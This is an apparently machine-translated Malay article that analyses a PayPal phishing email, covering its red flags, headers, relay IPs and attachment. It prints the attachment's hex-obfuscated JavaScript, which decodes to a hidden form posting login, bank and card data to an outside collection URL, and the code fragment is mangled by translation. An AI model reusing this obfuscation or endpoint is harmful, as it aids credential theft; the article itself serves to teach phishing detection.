Keselamatan Dalam Talian Memecahkan Anatomi Email Phishing
Di dunia hari ini di mana maklumat semua orang dalam talian, phishing adalah salah satu serangan dalam talian yang paling popular dan dahsyat, kerana anda sentiasa boleh membersihkan virus, tetapi jika butiran perbankan anda dicuri, anda menghadapi masalah. Berikut adalah pecahan satu serangan sedemikian yang kami terima.
Jangan berfikir bahawa hanya butiran perbankan anda yang penting: setelah semua, jika seseorang memperoleh kawalan atas login account anda, mereka tidak hanya mengetahui informasi yang terkandung dalam akun itu, tetapi kemungkinannya adalah informasi masuk yang sama dapat digunakan pada berbagai macam akaun. Dan jika mereka berkompromi dengan akaun e-mel anda, mereka boleh menetapkan semula semua kata laluan anda yang lain.
Oleh itu, selain mengekalkan kata laluan yang kuat dan berbeza, anda perlu sentiasa mencari e-mel palsu yang menyamar sebagai perkara yang sebenar. Walaupun kebanyakan percubaan phishing adalah amatir, sesetengahnya agak meyakinkan sehingga penting untuk memahami bagaimana mengenali mereka di paras permukaan serta bagaimana mereka bekerja di bawah tudung.
Imej oleh asirap
Menguji Apa yang ada di Pandangan Sempurna
E-mel contoh kami, seperti kebanyakan percubaan phishing, "memberitahu" anda tentang aktiviti di akaun PayPal anda yang, dalam keadaan biasa, akan membimbangkan. Jadi panggilan untuk bertindak adalah untuk mengesahkan / memulihkan akaun anda dengan menghantar hampir setiap maklumat peribadi yang anda boleh fikirkan. Sekali lagi, ini cukup rumit.
Walaupun ada pasti pengecualian, hampir setiap e-mel pancingan dan penipuan dimuatkan dengan bendera merah secara langsung dalam mesej itu sendiri. Walaupun teks itu meyakinkan, anda biasanya boleh menemui banyak kesilapan yang terkumpul di seluruh badan mesej yang menunjukkan mesej itu tidak sah.
Badan Mesej
Pada pandangan pertama, ini adalah salah satu daripada e-mel phishing yang lebih baik yang saya lihat. Tiada kesilapan ejaan atau tatabahasa dan kata kerja berbunyi mengikut apa yang anda harapkan. Walau bagaimanapun, terdapat beberapa bendera merah yang anda dapat lihat apabila anda mengkaji kandungan sedikit lebih rapat.
- "Paypal" - Kes yang betul ialah "PayPal" (modal P). Anda dapat melihat kedua-dua variasi digunakan dalam mesej. Syarikat-syarikat sangat disengajakan dengan penjenamaan mereka, jadi ragu-ragu seperti ini akan lulus proses pemeriksaan.
- "Izinkan ActiveX" - Berapa kali anda melihat perniagaan berasaskan web legit saiz Paypal menggunakan komponen proprietari yang hanya berfungsi pada penyemak imbas tunggal, terutama ketika mereka menyokong banyak pelayar? Pasti, di suatu tempat di luar sana beberapa syarikat melakukannya, tetapi ini adalah bendera merah.
- "Selamat." - Perhatikan bagaimana perkataan ini tidak berbaris di margin dengan seluruh teks perenggan. Walaupun saya meregangkan tingkap sedikit lagi, ia tidak membungkus atau ruang dengan betul.
- "Paypal!" - Ruang sebelum tanda seru kelihatan janggal. Hanya satu lagi yang saya pasti tidak akan berada dalam e-mel yang sah.
- "PayPal- Account Update Form.pdf.htm" - Mengapa Paypal akan melampirkan "PDF" terutamanya apabila mereka hanya boleh memaut ke halaman di laman web mereka? Di samping itu, mengapa mereka cuba menyamar sebagai fail HTML sebagai PDF? Ini adalah bendera merah terbesar mereka semua.
Header Mesej
Apabila anda melihat tajuk mesej, beberapa lagi bendera merah muncul:
- Alamat dari alamat [email protected].
- Alamat untuk hilang. Saya tidak kosong ini, ia bukan sebahagian daripada pengepala mesej standard. Biasanya syarikat yang mempunyai nama anda akan memperibadikan e-mel kepada anda.
Lampiran
Apabila saya membuka lampiran, anda boleh melihat susun atur yang tidak betul kerana tiada maklumat gaya. Sekali lagi, mengapa PayPal akan menghantar e-mel kepada bentuk HTML apabila mereka hanya dapat memberikan pautan di laman web mereka?
Catatan: kami menggunakan penampan lampiran HTML terbina dalam Gmail untuk ini, tetapi kami mengesyorkan bahawa anda JANGAN BUKA lampiran daripada penipu. Tidak pernah. Pernah. Mereka sering mengandungi eksploit yang akan memasang trojan pada PC anda untuk mencuri maklumat akaun anda.
Menggulung sedikit lagi anda dapat melihat bahawa bentuk ini meminta bukan sahaja untuk maklumat log masuk PayPal kami, tetapi untuk maklumat perbankan dan kad kredit juga. Beberapa imej dipecahkan.
Ia jelas percubaan phishing ini akan berlaku selepas semua dengan satu serangan.
Pecahan Teknikal
Walaupun ia sepatutnya cukup jelas berdasarkan apa yang terlihat jelas bahawa ini adalah percubaan pancingan data, kami akan memecah solek teknikal e-mel dan melihat apa yang boleh kami dapati.
Maklumat dari Lampiran
Perkara pertama yang perlu kita lihat ialah sumber HTML borang lampiran yang merupakan penyerahan data ke laman palsu.
Apabila cepat melihat sumber, semua pautan kelihatan sah kerana mereka menunjukkan sama ada "paypal.com" atau "paypalobjects.com" yang kedua-duanya legit.
Sekarang kita akan melihat beberapa maklumat dasar halaman Firefox mengumpulkan pada halaman.
Seperti yang anda dapat lihat, beberapa grafik ditarik dari domain "blessedtobe.com", "goodhealthpharmacy.com" dan "pic-upload.de" bukannya domain PayPal legit.
Maklumat dari Pengepala E-mel
Seterusnya kita akan melihat tajuk mesej e-mel mentah. Gmail menjadikannya tersedia melalui pilihan menu Show Original pada mesej.
Melihat maklumat pengepala untuk mesej asal, anda dapat melihat mesej ini disusun dengan menggunakan Outlook Express 6. Saya ragu PayPal mempunyai seseorang dalam kakitangan yang menghantar setiap mesej ini secara manual melalui klien e-mel yang sudah lama.
Sekarang melihat maklumat penghalaan, kita dapat melihat alamat IP kedua-dua penghantar dan pelayan mel menyampaikan.
Alamat IP "Pengguna" adalah penghantar asal. Melakukan pemeriksaan pantas pada maklumat IP, kita dapat melihat IP penghantaran di Jerman.
Dan apabila kita melihat pelayan mel menyampaikan (mail.itak.at), alamat IP yang kita dapat lihat ini adalah ISP yang berpusat di Austria. Saya ragu-ragu PayPal mengarahkan e-mel mereka secara langsung melalui ISP berasaskan Austria apabila mereka mempunyai ladang pelayan besar-besaran yang dengan mudah dapat mengendalikan tugas ini.
Di mana Adakah Data Pergi?
Oleh itu, kami telah menentukan dengan jelas ini adalah e-mel pancingan data dan mengumpulkan beberapa maklumat tentang di mana mesej itu berasal, tetapi bagaimana pula dengan mana data anda dihantar?
Untuk melihat ini, kita perlu terlebih dahulu menyimpan lampiran HTM lakukan desktop kita dan buka dalam editor teks. Menggulung ke sana, semuanya kelihatan teratur kecuali apabila kita sampai ke blok Javascript mencari yang mencurigakan.
Memecahkan sumber penuh blok terakhir Javascript, kita lihat:
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x = "3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"; y = "; untuk (i = 0; i
Bila-bila masa anda melihat rentetan huruf besar dan nombor rawak yang tertanam dalam blok Javascript, ia biasanya sesuatu yang mencurigakan. Melihat kod tersebut, pemboleh ubah "x" ditetapkan pada rentetan besar ini dan kemudian didekodkan kepada variabel "y". Hasil akhir pembolehubah "y" kemudian ditulis pada dokumen sebagai HTML.
Oleh kerana rentetan besar dibuat dari angka 0-9 dan huruf a-f, kemungkinan besar dikodkan melalui ASCII mudah ke penukaran Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Menterjemahkan kepada:
Ia bukan satu kebetulan bahawa ini menguraikan ke dalam bentuk borang HTML yang sah yang menghantar keputusan tidak kepada PayPal, tetapi ke laman penyangak.
Di samping itu, apabila anda melihat sumber borang HTML, anda akan melihat bahawa bentuk borang ini tidak kelihatan kerana ia dihasilkan secara dinamik melalui Javascript. Ini adalah cara yang bijak untuk menyembunyikan apa yang sebenarnya dilakukan oleh HTML jika seseorang hanya melihat sumber lampiran yang dihasilkan (seperti yang kita lakukan sebelumnya) berbanding pembukaan lampiran secara langsung dalam editor teks.
Menjalankan orang yang cepat di tapak yang menyinggung, kami dapat melihat ini adalah domain yang dihoskan di hos web yang popular, 1and1.
Apa yang menonjol ialah domain menggunakan nama yang boleh dibaca (berbanding dengan sesuatu seperti "dfh3sjhskjhw.net") dan domain itu telah didaftarkan selama 4 tahun. Oleh kerana itu, saya percaya domain ini dirampas dan digunakan sebagai bidak dalam percubaan phishing ini.
Cicicism adalah Pertahanan yang Baik
Apabila ia datang untuk kekal selamat dalam talian, ia tidak akan menyakitkan untuk mempunyai sedikit sinis.
Walaupun saya yakin terdapat lebih banyak bendera merah dalam e-mel contoh, apa yang telah kita katakan di atas adalah petunjuk yang kita lihat selepas beberapa minit peperiksaan. Hypothetically, jika tahap permukaan e-mel meniru rakan sejawatannya yang sah 100%, analisis teknikal masih akan mendedahkan sifatnya yang sebenarnya. Inilah sebabnya kenapa ia import untuk dapat mengkaji kedua-dua apa yang anda boleh dan tidak dapat melihat.